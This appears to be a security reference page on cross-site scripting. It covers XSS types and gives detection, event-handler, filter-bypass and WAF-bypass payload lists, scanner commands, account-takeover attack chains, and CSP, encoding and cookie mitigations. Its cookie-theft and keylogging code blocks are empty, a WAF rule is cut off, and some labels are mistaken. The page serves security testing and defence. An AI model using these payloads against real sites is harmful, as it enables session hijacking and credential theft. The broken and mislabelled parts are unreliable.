Home / Web Security / Cross-Site Scripting
High Severity | OWASP A03:2021

๐Ÿ”ด Cross-Site Scripting (XSS)

CWECWE-79: XSS
OWASPA03:2021 Injection
CVSS 3.17.3 (High)
CAPECCAPEC-63, 209, 242
Attack VectorNetwork
Privilege RequiredNone

๐Ÿง  Description

What is XSS?

Cross-Site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the victim's web browser by injecting malicious code into a trusted website. XSS occurs when web applications take untrusted data and render it without proper validation or encoding.

XSS allows attackers to:
  • Steal session cookies and hijack user sessions
  • Deface websites or inject malicious content
  • Redirect users to malicious websites
  • Perform keylogging and form hijacking
  • Access sensitive information in the DOM
  • Deliver malware to users

XSS Types:

  • Reflected XSS: Malicious script is part of the request sent to the server and is reflected back
  • Stored XSS: Malicious script is permanently stored on the target server
  • DOM-based XSS: Vulnerability exists in client-side code rather than server-side
  • Blind XSS: XSS payload is stored and executed in a different part of the application

๐Ÿท๏ธ Classification

  • Vulnerability Type: Client-Side Injection (CWE-79)
  • OWASP Category: A03:2021 - Injection
  • CAPEC:
    • CAPEC-63: Cross-Site Scripting
    • CAPEC-209: Cross-Site Scripting using Flash
    • CAPEC-242: Cross-Site Scripting in Error Messages
  • XSS Subtypes: Reflected, Stored, DOM-based, Blind

๐ŸŽฏ Attack Surface

XSS can occur in various input points:

  • โœ… Search Fields: Query parameters
  • โœ… Comment Sections: Blog comments, forum posts
  • โœ… User Profiles: Display names, bio fields
  • โœ… URL Parameters: GET parameters reflected in page
  • โœ… HTTP Headers: User-Agent, Referer
  • โœ… File Names: Uploaded file names displayed
  • โœ… Chat/Message Boards: User-submitted content
  • โœ… Product Reviews: E-commerce reviews

โš ๏ธ Preconditions

  • User Input: Application accepts user input and displays it without encoding
  • No Sanitization: Input is not sanitized or validated
  • No Output Encoding: Output is not properly encoded for HTML context
  • JavaScript Context: Input can break out of JavaScript strings

๐Ÿ” Detection

Manual Testing:

  • Inject basic payload: <script>alert(1)</script>
  • Test with image onerror: <img src=x onerror=alert(1)>
  • Test SVG: <svg onload=alert(1)>
  • Test event handlers: <body onload=alert(1)>

Automated Tools:

  • Burp Suite: Active/passive scanning
  • OWASP ZAP: Spider and scan
  • nuclei: XSS templates
  • XSStrike: Advanced XSS detection

๐Ÿ”ง Burp Suite Workflow

  1. Browse target application normally
  2. Review Proxy history for reflection points
  3. Send reflected parameter to Repeater
  4. Test with basic XSS payloads
  5. Check if payload is reflected without encoding
  6. Escalate to exploit - steal cookies, perform actions
# In Repeater, test:
GET /search?q= HTTP/1.1
Host: target.com

# If response contains the script tag unencoded - VULNERABLE

โš™๏ธ Tool Automation

๐Ÿ”ซ XSStrike

Advanced XSS detection and exploitation

๐Ÿ›ก๏ธ Burp Suite

Manual testing with Intruder

โšก Nuclei

Template-based XSS scanning

๐Ÿ” Dalfox

Go-based XSS scanner

# XSStrike
python3 xsstrike.py -u "http://target.com/search?q=test"

# nuclei
nuclei -u "http://target.com" -t templates/xss.yaml

# dalfox
dalfox url "http://target.com/search?q=test"

๐Ÿ’ฃ Basic Payloads

๐Ÿงช Detection Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<input onfocus=alert(1) autofocus>
๐Ÿ”“ Event Handlers
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video onerror=alert(1)>
<audio src=x onerror=alert(1)>
๐Ÿ“ HTML Context Breakout
</script><script>alert(1)</script>
<img src=x alt="><script>alert(1)</script>
<div><script>alert(1)</script>
</title></style></script><script>alert(1)</script>

๐Ÿš€ Advanced Payloads

๐Ÿ”ฅ DOM-based XSS
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<svg/onload=location='javascript:alert(1)'>
<body/onload=Function('alert(1)')()>
โšก Polynomial/Polyglot
javascript:/*--><svg/onload=alert(1)-->
<img src=x:alert(alt) onerror=eval(alt) alt="aler\ t(1)">
๐ŸŽฏ Filter Bypass
<scr\ ipt>alert(1)</scr\ ipt>
<scr\x00ipt>alert(1)</scr\x00ipt>
<SCR\ IPT>alert(1)</SCR\ IPT>

๐Ÿค– AI-Generated Payloads

Context-aware payloads for specific scenarios:

๐Ÿ”ง AngularJS Context
{{constructor.constructor('alert(1)')()}}
<img src=x ng-on-click="$event.view.alert(1)">
๐Ÿ”ง React/Mobile Context
<div onMouseOver="alert(1)">test</div>
๐Ÿ”ง Template Engines
{{7*7}} - Jinja2/Twig
${7*7} - ERB
<%= 7*7 %> - Rails

๐ŸŽจ Context-Aware Payloads

๐Ÿ“ JavaScript String Context
';alert(1);//
";alert(1);//
'-alert(1)-'
"-alert(1)-"
๐Ÿ›ก๏ธ WAF Bypass
<script>al\x65rt(1)</script>
<img src=x onerror=window['alert'](1)>
<body><script>alert(1)</script></body>
๐Ÿ—„๏ธ Browser-Specific
Firefox: <svg><animate onbegin=alert(1) attributeName=x>
Chrome: <script>alert(1)</script>
Edge: <details open ontoggle=alert(1)>

๐Ÿ“ Proof of Concept

Vulnerable Code Example:

// PHP - Vulnerable code
$name = $_GET['name'];
echo "Welcome, " . $name;

// Attacker requests:
// http://target.com/welcome.php?name=

// Result: Script executes in user's browser, stealing cookies

Cookie Theft PoC:

// Payload to steal cookies


// When victim visits, their cookies are sent to attacker

๐Ÿ“จ Request / Response

Attacker Request:

GET /search?q= HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0

Server Response (Vulnerable):

HTTP/1.1 200 OK
Content-Type: text/html



Search results for: 
...

๐Ÿ’ฅ Impact Analysis

Severity: HIGH (CVSS 7.3)

Session Hijacking:
  • Steal session cookies
  • Session fixation attacks
  • Access user accounts
Credential Theft:
  • Keylogging user input
  • Phishing via injected forms
  • Credential harvesting
Malware Delivery:
  • Redirect to malicious sites
  • Drive-by downloads
  • Exploit kit delivery

โšก Advanced Exploitation

1. Session Hijacking:

// Steal session


// Session fixation

2. Keylogging:

// Record keystrokes

3. Form Hijacking:

// Modify form action

4. DOM Modification:

// Modify page content

๐Ÿ”— Attack Chains

Chain 1: XSS to Account Takeover
1 Find XSS in search parameter
2 Inject cookie-stealing payload
3 Wait for admin to visit
โ†’ Steal admin session, access admin panel
Chain 2: Stored XSS to Defacement
1 Post comment with XSS payload
2 Payload stored in database
3 All users viewing page execute payload
โ†’ Mass credential theft or defacement

โœ… Test Cases

IDTest CasePayloadExpected
1Basic Script Tag<script>alert(1)</script>Alert popup
2Image Onerror<img src=x onerror=alert(1)>Alert popup
3SVG Onload<svg onload=alert(1)>Alert popup
4Event Handler<body onload=alert(1)>Alert popup
5DOM-based<img src=x onerror=eval(atob(...))>Alert popup

๐Ÿ›ก๏ธ Mitigation

โœ… Output Encoding: Encode all untrusted data based on the context (HTML, JavaScript, URL, CSS)

โœ… Content Security Policy (CSP): Implement strict CSP headers to prevent inline script execution

โœ… Input Validation: Validate and sanitize all user inputs

โœ… HTTPOnly Cookies: Set HttpOnly flag on session cookies to prevent JavaScript access

๐Ÿฐ Advanced Mitigation

1. Content Security Policy:

# Strict CSP Header
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'

# Allow specific sources
Content-Security-Policy: script-src 'self' https://trusted.cdn.com;

2. Output Encoding Libraries:

# Python - html.escape()
import html
safe_output = html.escape(user_input)

# JavaScript - DOMPurify
const clean = DOMPurify.sanitize(dirty);

3. Cookie Security:

# Set secure, HttpOnly, SameSite cookies
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict

๐Ÿ“Š Monitoring & Detection

WAF Rules:

# Detect XSS patterns in requests
SecRule REQUEST_URI "@rx (

SIEM Detection:

  • Alert on script tags in user input
  • Monitor for event handlers (onclick, onerror, onload)
  • Detect javascript: protocol in parameters
  • Alert on unusual encoding patterns

๐Ÿ” Security Controls

ControlImplementationPriority
Output EncodingContext-aware encoding of all outputCritical
CSPStrict Content Security PolicyHigh
Input ValidationWhitelist validation + sanitizationHigh
HTTPOnly CookiesSet HttpOnly and Secure flagsHigh
SameSite CookiesSet SameSite=Strict/LaxMedium
X-XSS-ProtectionEnable browser XSS filterLow

๐Ÿ”“ Bypass Techniques

๐Ÿ›ก๏ธ Filter Bypass
<scr\x00ipt> - Null byte
<scr<script>ipt> - Recursive
<scrscriptipt> - Double tag
<svg><script>alert(1)</script> - SVG context
๐ŸŽจ Encoding Bypass
%3Cscript%3E - URL encoding
<script - HTML entities
\x3cscript\x3e - Hex encoding
Note: Use only in authorized testing engagements.

๐Ÿ› ๏ธ Tools & Commands

๐Ÿ”ซ XSStrike

xsstrike.py -u "http://target.com"

๐Ÿ›ก๏ธ Burp Suite

Intruder + Scanner

โšก Dalfox

dalfox url "http://target.com"

๐Ÿ” DOM Invader

Burp DOM XSS scanner

๐Ÿ“š References

๐Ÿ”„ Retest Steps

StepActionValidation
1Implement output encodingCode review
2Deploy CSP headerTest that inline scripts fail
3Re-test with script tagScript not executed
4Re-test event handlersNot executed
5Verify cookies are HttpOnlydocument.cookie empty

โš™๏ธ Detection Logic

Static Analysis:

  • Scan for unescaped user input in HTML
  • Check for proper output encoding
  • Verify CSP headers
  • Check cookie flags

Dynamic Testing:

  • Fuzz all input points with XSS payloads
  • Test in different contexts
  • Verify CSP blocks execution

๐Ÿ”Ž Threat-Hunting Notes

IOCs:

  • Script tags in web logs
  • Event handlers in parameters
  • javascript: protocol in URLs
  • Unusual encoding in logs
  • High volume of XSS attempts from single IP

๐Ÿ›ก๏ธ Defensive Detection Ideas

1. Browser-Based Detection:

  • Deploy CSP-report-uri to collect violations
  • Monitor for XSS in report-uri endpoints

2. RASP:

  • Runtime application self-protection
  • Detect and block XSS at runtime
Back to Web Security